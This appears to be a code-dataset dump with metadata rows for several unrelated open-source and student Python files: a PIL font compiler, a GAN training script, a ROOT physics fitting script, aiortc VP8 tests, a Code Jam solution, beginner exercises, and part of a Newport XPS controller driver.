blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
467737aa13e6224c2b5459fae510519622e05c84 | b4c11d69197ef90dcacc8e34884036e4f576855e | /Python/myEnvironment/djangoEnv/bin/pilfont.py | 146697b69ee3a1e8db89379b57baf96f2fd4437e | [] | no_license | VT-Zhang/PYTHON_Platform_Works | c6314715e207995cce0244c38c8d48f95cf934b8 | 52654ef0ecf9102bfe378540818ebbb2dc27a134 | refs/heads/master | 2021-06-15T02:22:03.868898 | 2017-03-07T16:20:26 | 2017-03-07T16:20:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,085 | py | #!/Users/jianzhang/Dropbox/Dojo/Python/myEnvironment/djangoEnv/bin/python2.7
#
# The Python Imaging Library
# $Id$
#
# PIL raster font compiler
#
# history:
# 1997-08-25 fl created
# 2002-03-10 fl use "from PIL import"
#
from __future__ import print_function
import glob
import sys
# drivers
from PIL import BdfFontFile
from PIL import PcfFontFile
VERSION = "0.4"
if len(sys.argv) <= 1:
print("PILFONT", VERSION, "-- PIL font compiler.")
print()
print("Usage: pilfont fontfiles...")
print()
print("Convert given font files to the PIL raster font format.")
print("This version of pilfont supports X BDF and PCF fonts.")
sys.exit(1)
files = []
for f in sys.argv[1:]:
files = files + glob.glob(f)
for f in files:
print(f + "...", end=' ')
try:
fp = open(f, "rb")
try:
p = PcfFontFile.PcfFontFile(fp)
except SyntaxError:
fp.seek(0)
p = BdfFontFile.BdfFontFile(fp)
p.save(f)
except (SyntaxError, IOError):
print("failed")
else:
print("OK")
| [
"[email protected]"
] | |
dcebc6b36fed20d92041c019092864c956b743da | e6ebd1f9e3968f6ed613e9f35e46716115e6e9c3 | /chapter3/demo1.py | fdb50467279d444e9033ffd2743c6fed6e6e300c | [] | no_license | huwanping001/Python | 897046d3d6d1b420befeefcaa2b9544efa7d1881 | 3c76278f7a9b216b28b8880e0108af3c550b9372 | refs/heads/main | 2023-08-21T00:45:17.991833 | 2021-10-18T13:47:52 | 2021-10-18T13:47:52 | 409,586,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 197 | py | # 学校:四川轻化工大学
# 学院:自信学院
# 学生:胡万平
# 开发时间:2021/9/17 19:36
present= input('小胡想要什么礼物呢?')
print(present,type(present))
| [
"[email protected]"
] | |
5160df22bf339592d41b4ff90b972fa65bcbcd93 | 773c02448ad1766270583cadcbb5c2c71347efd2 | /T2_img2latent.py | 0a200f93eb514a9c131e57b12e6605ca580d353a | [] | no_license | thoppe/SyntheticCountenance | b4640c8009ba5bc2377a11aac88cc1be75d7b92c | c06e186fb0596a50d9080b38b80d81c58f2bdde4 | refs/heads/master | 2020-04-14T19:36:12.431157 | 2019-02-02T22:05:20 | 2019-02-02T22:05:20 | 164,064,092 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | """
The idea is to find the img such that D(img) is minimized, that is the picture
that _most_ fools the discriminator.
"""
import numpy as np
import os, json, glob, random, h5py
from tqdm import tqdm
import tensorflow as tf
from src.GAN_model import GAN_output_to_RGB, RGB_to_GAN_output
from src.img2latent import Image2Latent
def image_pipeline(batch_size=5):
f_h5 = 'samples/PGAN_small_images.h5'
with h5py.File(f_h5, 'r') as h5:
N = len(h5['Z'])
Z = h5['Z'][...]
while True:
idx = np.random.randint(0, N, size=batch_size)
img = np.array([h5['IMG'][i] for i in idx])
img = RGB_to_GAN_output(img, batch_size=batch_size, resize=False)
yield Z[idx], img
if __name__ == "__main__":
batch_size = 32
n_epochs = 2000
n_save_every = 50
ITR = image_pipeline(batch_size)
clf = Image2Latent(batch_size=batch_size)
while True:
for n, (z,img) in enumerate(ITR):
if n%n_save_every == 0:
clf.render(z, img)
#s = clf.save()
lx = clf.train(z, img)
print(n, lx)
| [
"[email protected]"
] | |
c639300afde098f8880ea4f170b16a2aa369d28c | 0f90bc3f68e674b2a71d940167b9d5702d18d8ba | /finalProject/env/lib/python3.6/abc.py | d3583e61a4a85959762a2d51fc07cc3be07470ea | [] | no_license | pondjames007/DetourningTheWeb | a0f0d730365097b2233c2b9e6ccac0bcc7c113e4 | 49aea061bea449b016eb7b35ff5489c35654dd28 | refs/heads/master | 2021-05-04T05:40:39.881902 | 2018-04-23T20:44:43 | 2018-04-23T20:44:43 | 120,343,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | /Users/pondjames007/anaconda3/lib/python3.6/abc.py | [
"[email protected]"
] | |
83c5bdc03f15bf3062de8e162dc37d0640411c79 | 71c7683331a9037fda7254b3a7b1ffddd6a4c4c8 | /Phys/BsKstKst/python/BsKstKst/FitMassAngles/Param_Diego/for_Juan.py | c5a03c629416915abae29c06369469f6b4fd23be | [] | no_license | pseyfert-cern-gitlab-backup/Urania | edc58ba4271089e55900f8bb4a5909e9e9c12d35 | 1b1c353ed5f1b45b3605990f60f49881b9785efd | refs/heads/master | 2021-05-18T13:33:22.732970 | 2017-12-15T14:42:04 | 2017-12-15T14:42:04 | 251,259,622 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,717 | py | from ROOT import *
from math import *
from array import *
from Urania import PDG
from Urania.Helicity import *
from Urania import RooInterfaces as D
# Generate the pdf using the tools in Urania.Helicity
A = doB2VX([0,1,2], helicities = [0], transAmp = 1)#0)
### masage a bit the expression to make it more suitable for fitting
pdf_split = DecomposeAmplitudes(A,TransAmplitudes.values())#H.values())
pdf_delete = {}
ape = TransAmplitudes["1_pe"]
a_s = TransAmplitudes["0_0"]
for ak in TransAmplitudes.values():
if ape==ak: continue
if a_s==ak: continue
_re, _im = TermsAsReImag(A,ak,ape)
pdf_delete[re(ak*ape.conjugate())]=_re
pdf_delete[im(ak*ape.conjugate())]=_im
pdf_delete[re(ape*ak.conjugate())]=_re
pdf_delete[im(ape*ak.conjugate())]=_im
phys = 0
for key in pdf_split:
if key in pdf_delete.keys():
print "deleting ",key
continue
phys += StrongPhases(key)*pdf_split[key]
### change the free variables to cosines
x = Symbol("helcosthetaK",real = True)
y = Symbol("helcosthetaL", real = True)
z = Symbol("helphi", real = True)
CThL = Cos(ThetaL)
CThK = Cos(ThetaK)
def changeFreeVars(function):
function = function.subs( Sin(2*ThetaK), 2*Sin(ThetaK)*Cos(ThetaK) )
function = function.subs( Cos(2*ThetaK), Cos(ThetaK)**2 - Sin(ThetaK)**2)
function = function.subs( Sin(2*ThetaL), 2*Sin(ThetaL)*Cos(ThetaL) )
function = function.subs( Cos(2*ThetaL), Cos(ThetaL)**2 - Sin(ThetaL)**2)
function = function.subs( Sin(ThetaK), Sqrt(1-Cos(ThetaK)**2))
function = function.subs( Sin(ThetaL), Sqrt(1-Cos(ThetaL)**2))
function = function.subs([(CThK,x),(CThL,y), (Phi,z)])
return function
func = changeFreeVars(phys)
c1_th1 = Symbol("c1th1",real=True)
c2_th1 = Symbol("c2th1",real=True)
c3_th1 = Symbol("c3th1",real=True)
c4_th1 = Symbol("c4th1",real=True)
y_th1 = Symbol("yth1",real=True)
c1_th2 = Symbol("c1th2",real=True)
c2_th2 = Symbol("c2th2",real=True)
c3_th2 = Symbol("c3th2",real=True)
c4_th2 = Symbol("c4th2",real=True)
y_th2 = Symbol("yth2",real=True)
acc_coefs = [c1_th1,c2_th1,c3_th1,c4_th1,y_th1,c1_th2,c2_th2,c3_th2,c4_th2,y_th2]
c5_th1 = y_th1-(1+c1_th1+c2_th1+c3_th1+c4_th1)
c5_th2 = y_th2-(1+c1_th2+c2_th2+c3_th2+c4_th2)
acc1 = 1 + c1_th1*x + c2_th1*x*x + c3_th1*x*x*x + c4_th1*x*x*x*x + c5_th1*x*x*x*x*x
acc2 = 1 + c1_th2*y + c2_th2*y*y + c3_th2*y*y*y + c4_th2*y*y*y*y + c5_th2*y*y*y*y*y
# func = func*acc1*acc2
##### Generate and compile a fitting class corresponding to "func"
### Trial 1, w/o analytical integrals
op = D.RooClassGenerator(func*acc1*acc2, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"AngularPDFAcc_2011")
# op = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values(),"AngularPDFNoAcc")
op.makePdf(integrable = kTRUE) ## You can also use makeFunc to generate just a RooAbsReal. Still not tested though
op.doIntegral(1,(x,-1,1))
op.doIntegral(2,(y,-1,1))
op.doIntegral(3,(z,-Pi,Pi))
op.doIntegral(4,(x,-1,1),(y,-1,1))
op.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
op.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
op.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
op.overwrite()
### Trial 2, now lets generate a version using analytical integrals
# op2 = D.RooClassGenerator(func, [x,y,z]+TransAmpModuli.values()+TransAmpPhases.values()+acc_coefs,"RooSecond")
# op2.makePdf(integrable = kTRUE)
# op2.doIntegral(1,(x,-1,1))
# op2.doIntegral(2,(y,-1,1))
# op2.doIntegral(3,(z,-Pi,Pi))
# op2.doIntegral(4,(x,-1,1),(y,-1,1))
# op2.doIntegral(5,(x,-1,1),(z,-Pi,Pi))
# op2.doIntegral(6,(y,-1,1),(z,-Pi,Pi))
# op2.doIntegral(7,(x,-1,1),(y,-1,1),(z,-Pi,Pi))
# op2.overwrite()
### Compile online the two models and load the class to python
op.invoke()#, op2.invoke()
BREAK
gROOT.ProcessLine(".x RooSecond.cxx+")
############## MAKING TREE
plot = 1
label = 'PLOT'
f = TFile("${WHOME}/NTuples_Bs2KstKst_strip17/public/Bs2KstKst_generated_MC11_angles.root")
tree=f.Get("T")
f1=TFile("/tmp/trash.root","recreate")
tree1 = tree.CopyTree("1")
tree2 = tree.CopyTree("1")
################### CONSTRUCTING THE MODEL
CThetaL = RooRealVar("CosTheta1","cos(ThetaL) ", -1,1)
CThetaK = RooRealVar("CosTheta2","cos(ThetaK) ", -1,1)
Phi = RooRealVar("Phi","Phi", -pi,pi)
A0 = RooRealVar("A0","A0",0.77,0.5,1.)
Apa = RooRealVar("Apa","Apa",0.5,0.3,1.)
As = RooRealVar("As" ,"As" ,1/2,0.,1.)
Ape = RooFormulaVar("Ape","Ape","sqrt(1-As*As-Apa*Apa-A0*A0)",RooArgList(A0,As,Apa))
deltaPa = RooRealVar("deltaPa","deltaPa",2.501,0.,2*pi)
deltaPe = RooRealVar("deltaPe","deltaPe",0.)#1, -pi,pi)
deltaS = RooRealVar("deltaS" ,"deltaS" ,0.9,0.,2*pi)
model=RooFirst("model","model",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPe,deltaS)
# model2=RooSecond("model2","model2",CThetaK,CThetaL,Phi,Apa,Ape,As,A0,deltaPa,deltaPepi,deltaS)
################### FITTING DATA
### tree - mix of B & Bbar
### tree1 - K+
### tree2 - K-
data = RooDataSet(label, label,tree1,RooArgSet(CThetaL,CThetaK,Phi))
#data = model.generate(RooArgSet(CThetaL,CThetaK,Phi),100000) ;
As.setVal(0)
As.setConstant(kTRUE)
deltaS.setConstant(kTRUE)
#deltaPe.setConstant(kTRUE)
def test(model,cv):
res = model.fitTo(data,RooFit.Minos(kTRUE))#, RooFit.Range("REDUCED"))
cv.Divide(2,2)
cv.cd(1)
Angframe = CThetaK.frame()
data.plotOn(Angframe)
model.plotOn(Angframe)
Angframe.Draw()
cv.cd(2)
Angframeb = CThetaL.frame()
data.plotOn(Angframeb)
model.plotOn(Angframeb)
Angframeb.Draw()
cv.cd(3)
Angframec = Phi.frame()
data.plotOn(Angframec)
model.plotOn(Angframec)
Angframec.Draw()
return res, Angframe, Angframeb, Angframec
cv = TCanvas()
w_1 = test(model,cv)
# w_2 = test(model2)
################ DRAWING
| [
"[email protected]"
] | |
c48e575ae1fb8a2c929db8e5ce19ddf8a1db5e42 | 989b3499948137f57f14be8b2c77d0610d5975e6 | /python-package/daily_study/python/question_python(resolved)/chapter4_conditional_and_loops(완결)/iii_five_seven.py | 978209ab4157d0feb585ee846dc3b32fb9719737 | [] | no_license | namkiseung/python_BasicProject | 76b4c070934ad4cb9d16ce844efa05f64fb09ac0 | 460d05248b2d1431624aba960e28bece888643e4 | refs/heads/master | 2022-12-13T21:12:06.865241 | 2020-04-23T01:30:08 | 2020-04-23T01:30:08 | 142,980,920 | 1 | 1 | null | 2022-12-08T02:27:40 | 2018-07-31T07:49:17 | Python | UTF-8 | Python | false | false | 838 | py | # -*- coding: utf-8 -*-
def five_seven(x, y):
""" 전달 받은 두 수(경계 모두 포함)의 범위에서 7로 나눠지면서, 5의 배수인 수의 목록을 "," 로 구분한 문자열로 반환하는 함수를 작성하자
sample in/out:
five_seven(1500, 1600) -> "1505, 1540, 1575"
five_seven(1500, 1700) -> "1505, 1540, 1575, 1610, 1645, 1680"
"""
# 여기 작성
result = ''
# x부터 y 사이 숫자중
for num in range(x, y+1):
if num % 7 == 0 and num % 5 == 0:
result ='',num
print num
else:
continue
# 만약 x가 7로 나누었을때 나머지 0
#만약 x가
return 'success'
if __name__ == "__main__":
print five_seven(1500, 1600)
print five_seven(1500, 1700)
pass
| [
"[email protected]"
] | |
0ac4e38308fb4ff518727b8ee1195fa098b9eb57 | 9a94357b2cc45b1e6a56c5c309fad0f717e96b2b | /tests/test_vpx.py | 108360a809ec883ab5d5c6b8521ffbd7c1e719a3 | [
"BSD-3-Clause"
] | permissive | gitter-badger/aiortc | 34099aee833a56d36f53b74336a2e7344d274cf3 | 0417b6b9c75dd4fc9f049ddeda7f09f306318574 | refs/heads/master | 2020-03-30T11:22:22.704701 | 2018-10-01T12:49:46 | 2018-10-01T13:16:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,489 | py | from unittest import TestCase
from aiortc.codecs import get_decoder, get_encoder
from aiortc.codecs.vpx import (Vp8Decoder, Vp8Encoder, VpxPayloadDescriptor,
_vpx_assert, number_of_threads)
from aiortc.mediastreams import VIDEO_TIME_BASE, VideoFrame
from aiortc.rtcrtpparameters import RTCRtpCodecParameters
from .codecs import CodecTestCase
VP8_CODEC = RTCRtpCodecParameters(name='VP8', clockRate=90000)
class VpxPayloadDescriptorTest(TestCase):
def test_no_picture_id(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x10')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x10')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=None)')
self.assertEqual(rest, b'')
def test_short_picture_id_17(self):
"""
From RFC 7741 - 4.6.3
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x11')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 17)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x11')
self.assertEqual(repr(descr), 'VpxPayloadDescriptor(S=1, PID=0, pic_id=17)')
self.assertEqual(rest, b'')
def test_short_picture_id_127(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x7f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 127)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x7f')
self.assertEqual(rest, b'')
def test_long_picture_id_128(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x80\x80')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 128)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x80\x80')
self.assertEqual(rest, b'')
def test_long_picture_id_4711(self):
"""
From RFC 7741 - 4.6.5
"""
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x80\x92\x67')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x80\x92\x67')
self.assertEqual(rest, b'')
def test_tl0picidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\xc0\x92\x67\x81')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, 4711)
self.assertEqual(descr.tl0picidx, 129)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\xc0\x92\x67\x81')
self.assertEqual(rest, b'')
def test_tid(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x20\xe0')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, (3, 1))
self.assertEqual(descr.keyidx, None)
self.assertEqual(bytes(descr), b'\x90\x20\xe0')
self.assertEqual(rest, b'')
def test_keyidx(self):
descr, rest = VpxPayloadDescriptor.parse(b'\x90\x10\x1f')
self.assertEqual(descr.partition_start, 1)
self.assertEqual(descr.partition_id, 0)
self.assertEqual(descr.picture_id, None)
self.assertEqual(descr.tl0picidx, None)
self.assertEqual(descr.tid, None)
self.assertEqual(descr.keyidx, 31)
self.assertEqual(bytes(descr), b'\x90\x10\x1f')
self.assertEqual(rest, b'')
class Vp8Test(CodecTestCase):
def test_assert(self):
with self.assertRaises(Exception) as cm:
_vpx_assert(1)
self.assertEqual(str(cm.exception), 'libvpx error: Unspecified internal error')
def test_decoder(self):
decoder = get_decoder(VP8_CODEC)
self.assertTrue(isinstance(decoder, Vp8Decoder))
def test_encoder(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
frame = VideoFrame(width=640, height=480)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 0)
# change resolution
frame = VideoFrame(width=320, height=240)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
def test_encoder_large(self):
encoder = get_encoder(VP8_CODEC)
self.assertTrue(isinstance(encoder, Vp8Encoder))
# first keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 0
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 0)
# delta frame
frame = VideoFrame(width=2560, height=1920)
frame.pts = 3000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame)
self.assertEqual(len(payloads), 1)
self.assertTrue(len(payloads[0]) < 1300)
self.assertEqual(timestamp, 3000)
# force keyframe
frame = VideoFrame(width=2560, height=1920)
frame.pts = 6000
frame.time_base = VIDEO_TIME_BASE
payloads, timestamp = encoder.encode(frame, force_keyframe=True)
self.assertEqual(len(payloads), 7)
self.assertEqual(len(payloads[0]), 1300)
self.assertEqual(timestamp, 6000)
def test_number_of_threads(self):
self.assertEqual(number_of_threads(1920 * 1080, 16), 8)
self.assertEqual(number_of_threads(1920 * 1080, 8), 3)
self.assertEqual(number_of_threads(1920 * 1080, 4), 2)
self.assertEqual(number_of_threads(1920 * 1080, 2), 1)
def test_roundtrip_1280_720(self):
self.roundtrip_video(VP8_CODEC, 1280, 720)
def test_roundtrip_960_540(self):
self.roundtrip_video(VP8_CODEC, 960, 540)
def test_roundtrip_640_480(self):
self.roundtrip_video(VP8_CODEC, 640, 480)
def test_roundtrip_320_240(self):
self.roundtrip_video(VP8_CODEC, 320, 240)
| [
"[email protected]"
] | |
b2e1e547eb7cb40072a470450961ec3ea2a10584 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_118/652.py | 4beb500f3c8a4122fb591a82efec72a0653e53da | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,386 | py |
n = int(raw_input())
for c in range(n):
(A,B) = (int(r) for r in raw_input().split(' '))
L = len(str(B))
ans = []
out = 0
# The odd ones out
for v in (1,4,9):
if A <= v <= B:
ans.append(v)
out += 1
# Twos
for d in range(L/2+2):
s = '2'+'0'*d+'2'
sq = int(s)**2
#print s,sq
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
for d in range(L/4+2):
s = '2'+'0'*d+'1'+'0'*d+'2'
sq = int(s)**2
if A <= sq <= B: out += 1
if A <= sq <= B: ans.append(sq)
# Binary
p = [0,0,0,0,0]
beg = set()
for p[0] in range(L/4+2):
for p[1] in range(min(p[0],L/4+1),L/4+2):
for p[2] in range(min(p[1],L/4+1),L/4+2):
for p[3] in range(min(p[2],L/4+1),L/4+2):
for p[4] in range(min(p[3],L/4+1),L/4+2):
s = ['0'] * (L/4+1)
for pos in range(5):
if p[pos] < (L/4+1): s[p[pos]] = '1'
a = ''.join(s)
a = a[(a+'1').find('1'):]
beg.add(a)
for b in beg:
if b:
if sum([int(u) for u in b]) >= 5: continue
rev = [b+b[::-1],b+'0'+b[::-1],b+'1'+b[::-1],b+'2'+b[::-1]]
for v in rev:
v2 = int(v)**2
s = str(v2)
if A <= v2 <= B and s == s[::-1]: out += 1
if A <= v2 <= B and s == s[::-1]: ans.append(v2)
print "Case #%d: %d" % (c+1,out)
#y = len(list(set(range(A,B+1)).intersection(set([1,4,9,121,484]))))
#print A,B, ans
| [
"[email protected]"
] | |
a0ab6ad9437802c9e710e2446a34b6e0e6f0927f | 298e100a601f3edcc4b9c8dd465d934554b87065 | /config/XPS/xps_config_oct2010/XPS_C8_drivers.py | 694dd48501e6ca5bf579217deeb004b6ff834df9 | [] | no_license | newville/xrmcollect | 27bc673d1a1e0cd6ab928e27fd4964e7ca5eddd4 | f479e8812a244d478b456dab942506892180f17d | refs/heads/master | 2023-08-24T17:57:38.090068 | 2016-05-11T21:32:15 | 2016-05-11T21:32:15 | 1,025,945 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 109,311 | py | # XPS Python class
#
# for XPS-C8 Firmware V2.6.x
#
# See Programmer's manual for more information on XPS function calls
import socket
class XPS:
# Defines
MAX_NB_SOCKETS = 100
# Global variables
__sockets = {}
__usedSockets = {}
__nbSockets = 0
# Initialization Function
def __init__ (self):
XPS.__nbSockets = 0
for socketId in range(self.MAX_NB_SOCKETS):
XPS.__usedSockets[socketId] = 0
# Send command and get return
def __sendAndReceive (self, socketId, command):
try:
XPS.__sockets[socketId].send(command)
ret = XPS.__sockets[socketId].recv(1024)
while (ret.find(',EndOfAPI') == -1):
ret += XPS.__sockets[socketId].recv(1024)
except socket.timeout:
return [-2, '']
except socket.error (errNb, errString):
print 'Socket error : ' + errString
return [-2, '']
for i in range(len(ret)):
if (ret[i] == ','):
return [int(ret[0:i]), ret[i+1:-9]]
# TCP_ConnectToServer
def TCP_ConnectToServer (self, IP, port, timeOut):
socketId = 0
if (XPS.__nbSockets < self.MAX_NB_SOCKETS):
while (XPS.__usedSockets[socketId] == 1 and socketId < self.MAX_NB_SOCKETS):
socketId += 1
if (socketId == self.MAX_NB_SOCKETS):
return -1
else:
return -1
XPS.__usedSockets[socketId] = 1
XPS.__nbSockets += 1
try:
XPS.__sockets[socketId] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
XPS.__sockets[socketId].connect((IP, port))
XPS.__sockets[socketId].settimeout(timeOut)
XPS.__sockets[socketId].setblocking(1)
except socket.error:
return -1
return socketId
# TCP_SetTimeout
def TCP_SetTimeout (self, socketId, timeOut):
if (XPS.__usedSockets[socketId] == 1):
XPS.__sockets[socketId].settimeout(timeOut)
# TCP_CloseSocket
def TCP_CloseSocket (self, socketId):
if (socketId >= 0 and socketId < self.MAX_NB_SOCKETS):
try:
XPS.__sockets[socketId].close()
XPS.__usedSockets[socketId] = 0
XPS.__nbSockets -= 1
except socket.error:
pass
# GetLibraryVersion
def GetLibraryVersion (self):
return ['XPS-C8 Firmware V2.6.x Beta 19']
# ControllerMotionKernelTimeLoadGet : Get controller motion kernel time load
def ControllerMotionKernelTimeLoadGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerMotionKernelTimeLoadGet(double *,double *,double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(4):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# ControllerStatusGet : Read controller current status
def ControllerStatusGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusGet(int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# ControllerStatusStringGet : Return the controller status string corresponding to the controller status code
def ControllerStatusStringGet (self, socketId, ControllerStatusCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ControllerStatusStringGet(' + str(ControllerStatusCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# ElapsedTimeGet : Return elapsed time from controller power on
def ElapsedTimeGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ElapsedTimeGet(double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# ErrorStringGet : Return the error string corresponding to the error code
def ErrorStringGet (self, socketId, ErrorCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'ErrorStringGet(' + str(ErrorCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# FirmwareVersionGet : Return firmware version
def FirmwareVersionGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'FirmwareVersionGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecute : Execute a TCL script from a TCL file
def TCLScriptExecute (self, socketId, TCLFileName, TaskName, ParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecute(' + TCLFileName + ',' + TaskName + ',' + ParametersList + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecuteAndWait : Execute a TCL script from a TCL file and wait the end of execution to return
def TCLScriptExecuteAndWait (self, socketId, TCLFileName, TaskName, InputParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecuteAndWait(' + TCLFileName + ',' + TaskName + ',' + InputParametersList + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecuteWithPriority : Execute a TCL script with defined priority
def TCLScriptExecuteWithPriority (self, socketId, TCLFileName, TaskName, TaskPriorityLevel, ParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecuteWithPriority(' + TCLFileName + ',' + TaskName + ',' + TaskPriorityLevel + ',' + ParametersList + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptKill : Kill TCL Task
def TCLScriptKill (self, socketId, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptKill(' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TimerGet : Get a timer
def TimerGet (self, socketId, TimerName):
if (XPS.__usedSockets[socketId] == 0):
return
